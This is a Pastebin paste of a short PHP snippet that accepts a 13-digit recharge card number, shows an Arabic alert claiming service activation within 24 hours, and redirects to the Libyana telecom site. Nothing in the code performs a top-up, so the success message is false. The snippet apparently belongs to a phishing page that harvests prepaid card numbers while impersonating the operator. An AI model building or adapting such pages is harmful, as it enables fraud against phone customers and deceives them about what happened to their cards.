Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- if(isset($_POST['card']) && strlen($_POST['card']) == 13 && is_numeric($_POST['card'])){
- echo "<script>alert('تمت العملية بنجاح سوف يتم تفعيل الخدمة خلال 24 ساعة');window.location.replace('http://libyana.ly');</script>";
- }else{
- echo "<script>alert('رقم بطاقة التعبئة غير صحيح')</script>";
- }
Advertisement
Add Comment
Please, Sign In to add comment